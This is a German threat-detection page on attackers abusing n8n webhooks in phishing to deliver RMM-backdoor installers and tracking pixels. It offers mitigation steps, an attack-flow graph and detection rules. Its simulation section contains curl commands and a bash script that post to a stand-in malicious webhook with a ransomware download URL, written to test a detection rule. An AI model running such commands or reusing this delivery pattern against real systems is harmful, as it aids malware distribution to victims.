Bedrohungsakteure missbrauchen n8n zur Automatisierung von KI-gesteuerten Angriffen
Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure nutzen die n8n Low-Code-Automatisierungsplattform aus, um bösartige Nutzlasten zu verteilen und E-Mail-Empfänger zu profilieren. Durch das Einfügen schädlicher Webhook-URLs in Phishing-Nachrichten können sie ausführbare Dateien oder MSI-Installer übermitteln, die Remote-Zugriffstools auf den Systemen der Opfer installieren. Die Aktivität umfasst auch den Einsatz unsichtbarer Tracking-Pixel, die Opferinformationen sammeln, sobald die E-Mail geöffnet wird. Diese Kampagne zeigt, wie ein legitimer Workflow-Automatisierungsdienst zur Malware-Auslieferung umfunktioniert werden kann, ohne gestohlene Anmeldedaten zu benötigen.
Untersuchung
Cisco Talos analysierte eine Reihe von Phishing-Kampagnen, die zwischen Oktober 2025 und März 2026 beobachtet wurden und auf n8n Webhook-URLs in E-Mail-Nachrichten setzten. Die Köder verwendeten gefälschte OneDrive-Links, die zuerst eine CAPTCHA-Aufforderung anzeigten, bevor sie entweder eine schädliche .exe oder eine MSI-Datei bereitstellten. Nach der Ausführung installierten die Nutzlasten modifizierte Versionen von Datto oder ITarian RMM-Tools und erstellten geplante Aufgaben, um die Persistenz aufrechtzuerhalten. Talos stellte auch Fingerabdruck-Aktivitäten durch Bild-Tags fest, die n8n Webhook-URLs mit opferspezifischen Identifikatoren aufriefen.
Minderung
Organisationen sollten auf ungewöhnlichen abgehenden Datenverkehr zu n8n-bezogenen Domains von Systemen überwachen, die normalerweise keine Automatisierungsdienste verwenden würden, und auf verdächtige Webhook-URL-Muster prüfen. URLs, die auf unbekannte Subdomains von n8n.cloud auflösen, sollten blockiert oder in einer Sandbox überprüft werden, bevor Benutzerzugriff erlaubt wird. E-Mail-Sicherheitskontrollen sollten auch darauf abgestimmt werden, bösartige HTML-Inhalte, gefälschte CAPTCHA-Flüsse und versteckte Tracking-Pixel zu erkennen. Relevante IOCs, einschließlich Webhook-URLs und bösartiger Datei-Hashes, sollten mit Bedrohungsinformationsplattformen und internen Verteidigern geteilt werden.
Reaktion
Sicherheitsteams sollten die Präsenz von n8n Webhook-URLs in E-Mail-Inhalten oder Netzwerktelemetrie melden und alle betroffenen Hosts isolieren, sobald verdächtige Aktivitäten bestätigt werden. Alle installierten RMM-Tools und zugehörigen geplanten Aufgaben sollten entfernt werden, gefolgt von einer forensischen Analyse, um zusätzliche Persistenz oder nachfolgende Nutzlasten aufzudecken. Firewall- und Proxy-Richtlinien sollten aktualisiert werden, um den Zugriff auf unautorisierte n8n-Endpunkte zu beschränken. Organisationen sollten auch einen vollständigen IOCs-Teilen-Prozess zwischen internen Teams und vertrauenswürdigen externen Partnern abschließen.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes action_phishing["<b>Aktion</b> – <b>T1566 Phishing</b>: Bedrohungsakteure senden bösartige E-Mails mit n8n Webhook-URLs, um Opfer anzulocken.<br/><b>Beschreibung</b>: Phishing versucht, bösartige Inhalte per E-Mail zu übermitteln."] class action_phishing action tool_webhook["<b>Werkzeug</b> – <b>Name</b>: n8n Webhook<br/><b>Beschreibung</b>: Benutzerdefinierter Web-Endpunkt zur Lieferung von Nutzlasten."] class tool_webhook tool action_user_execution["<b>Aktion</b> – <b>T1204.001 Benutzer-Ausführung: Bösartiger Link</b>: Das Opfer klickt auf den Webhook-Link, wodurch der Browser die URL anfordert.<br/><b>Beschreibung</b>: Benutzer interagiert mit bösartigen Inhalten."] class action_user_execution action action_exfil_webhook1["<b>Aktion</b> – <b>T1567.004 Exfiltration über Webhook</b>: Webhook liefert eine bösartige HTML-Seite mit einem CAPTCHA und streamt eine Nutzlast (EXE oder MSI), während Tracking-Pixel bereitgestellt werden.<br/><b>Beschreibung</b>: Nutzt einen Webdienst zur Lieferung und Exfiltration von Daten."] class action_exfil_webhook1 action malware_payload_exe["<b>Malware</b> – <b>Name</b>: Nutzlast EXE/MSI<br/><b>Beschreibung</b>: Ausführbare Datei, die PowerShell ausführt, um ein modifiziertes RMM-Tool zu installieren."] class malware_payload_exe malware action_powershell["<b>Aktion</b> – <b>T1059.001 PowerShell</b>: Heruntergeladene ausführbare Datei führt PowerShell-Befehle aus, um das modifizierte RMM-Tool zu konfigurieren und zu installieren.<br/><b>Beschreibung</b>: Befehls- und Skript-Interpreter."] class action_powershell action malware_rmm["<b>Malware</b> – <b>Name</b>: Modifizierter RMM-Backdoor<br/><b>Beschreibung</b>: Fernüberwachungs- und Verwaltungs-Tool zur Persistenz."] class malware_rmm malware action_service_execution["<b>Aktion</b> – <b>T1569.002 Dienst-Ausführung</b>: RMM-Tool wird als Windows-Dienst für Persistenz installiert.<br/><b>Beschreibung</b>: Wird über einen Systemdienst ausgeführt."] class action_service_execution action action_scheduled_task["<b>Aktion</b> – <b>T1053 Geplante Aufgabe/Job</b>: Eine geplante Aufgabe wird erstellt, um sicherzustellen, dass das RMM-Tool dauerhaft ausgeführt wird.<br/><b>Beschreibung</b>: Sichert wiederkehrende Ausführung."] class action_scheduled_task action action_msi_execution["<b>Aktion</b> – <b>T1218.007 Msiexec</b>: Bösartige MSI wird über msiexec ausgeführt, um den RMM-Backdoor zu installieren.<br/><b>Beschreibung</b>: System-Binary-Proxy-Ausführung."] class action_msi_execution action action_exfil_webhook2["<b>Aktion</b> – <b>T1567.004 Exfiltration über Webhook</b>: Unsichtbares Tracking-Pixel lädt den Webhook, um E-Mail-Öffnungsevents und Geräteinformationen für die Aufklärung zu erfassen."] class action_exfil_webhook2 action %% Connections action_phishing –>|liefert| tool_webhook tool_webhook –>|löst aus| action_user_execution action_user_execution –>|führt zu| action_exfil_webhook1 action_exfil_webhook1 –>|liefert| malware_payload_exe malware_payload_exe –>|führt aus| action_powershell action_powershell –>|installiert| malware_rmm malware_rmm –>|besteht über| action_service_execution action_service_execution –>|erstellt| action_scheduled_task action_scheduled_task –>|unterstützt| action_msi_execution action_msi_execution –>|installiert| malware_rmm malware_rmm –>|kommuniziert über| action_exfil_webhook2 "
Angriffsfluss
Erkennungen
Mögliches bösartiges Datei-Doppel-Erweiterung (über Prozess-Erstellung)
Ansehen
Windows ITarian Endpoint Manager Ausführungsversuch (über Prozess-Erstellung)
Ansehen
Alternative Fernzugriffs-/Verwaltungssoftware (über Prozess-Erstellung)
Ansehen
Mögliche Dateninfiltration/Exfiltration/C2 über Dienste von Drittanbietern/Werkzeuge (über Proxy)
Ansehen
Mögliche Dateninfiltration/Exfiltration/C2 über Dienste von Drittanbietern/Werkzeuge (über DNS)
Ansehen
IOCs (HashSha256) zum Erkennen: Das n8n Albtraum: Wie Bedrohungsakteure AI Workflow-Automatisierung missbrauchen
Ansehen
Ermitteln von HTTP GET-Anfragen zu n8n Webhook-URLs [Proxy]
Ansehen
Erkennung des Missbrauchs von n8n Webhooks für Malware-Lieferung und Geräte-Fingerprinting [Webserver]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie & Baseline Pre-Flight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die der Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und sollen die genauen Telemetriedaten erzeugen, die von der Erkennungslogik erwartet werden.
-
Angriffsablauf & Befehle:
Ein Angreifer kauft eine kurzlebige Domain, die auf
n8n.cloud/webhookzeigt. Sie erstellen einen bösartigen n8n Workflow, der, sobald er ausgelöst wird, eine Ransomware-Nutzlast bereitstellt. Die Phishing-E-Mail enthält einen Link zu einer Landing Page mit einer CAPTCHA-Challenge. Das Opfer löst das CAPTCHA, das der JavaScript des Angreifers als WertCAPTCHA=solved123im HTTP-Body einer POST-Anfrage an den Webhook weiterleitet. Der Webhook antwortet mit einem PowerShell-Downloader, der die Nutzlast ausführt. Dieser Fluss generiert eine HTTP-Anfrage, deren URLn8n.cloud/webhookand dessen Body enthält den StringCAPTCHA, perfekt passend zur Sigma-Regel.# Schritt 1 – Opfer schließt CAPTCHA ab (simuliert) CAPTCHA_TOKEN="solved123" # Schritt 2 – Die bösartige POST erstellen, die die Aktion des Opfers imitiert curl -X POST "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=https://malicious.example.com/ransomware.exe" -
Regressionstest-Skript:
#!/usr/bin/env bash set -euo pipefail # Variablen – an Ihre Testumgebung anpassen WEBHOOK_HOST="my.malicious-n8n.cloud" WEBHOOK_PATH="/webhook/malicious-workflow" CAPTCHA_TOKEN="solved123" PAYLOAD_URL="https://malicious.example.com/ransomware.exe" echo "[*] Simuliere CAPTCHA-gesteuerten n8n Webhook-Missbrauch..." curl -s -o /dev/null -w "%{http_code}n" -X POST "https://${WEBHOOK_HOST}${WEBHOOK_PATH}" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=${PAYLOAD_URL}" echo "[+] Simulation abgeschlossen. Überprüfen Sie die Erkennung im SIEM." -
Aufräumkommandos:
# Wenn ein echter Webhook zum Testen erstellt wurde, löschen Sie ihn über die n8n UI oder API. # Beispiel-API-Aufruf (ersetzen Sie API_KEY und WORKFLOW_ID): curl -X DELETE "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Authorization: Bearer API_KEY" # Alle temporären Dateien entfernen (keine in diesem Skript erstellt) echo "[+] Aufräumen abgeschlossen."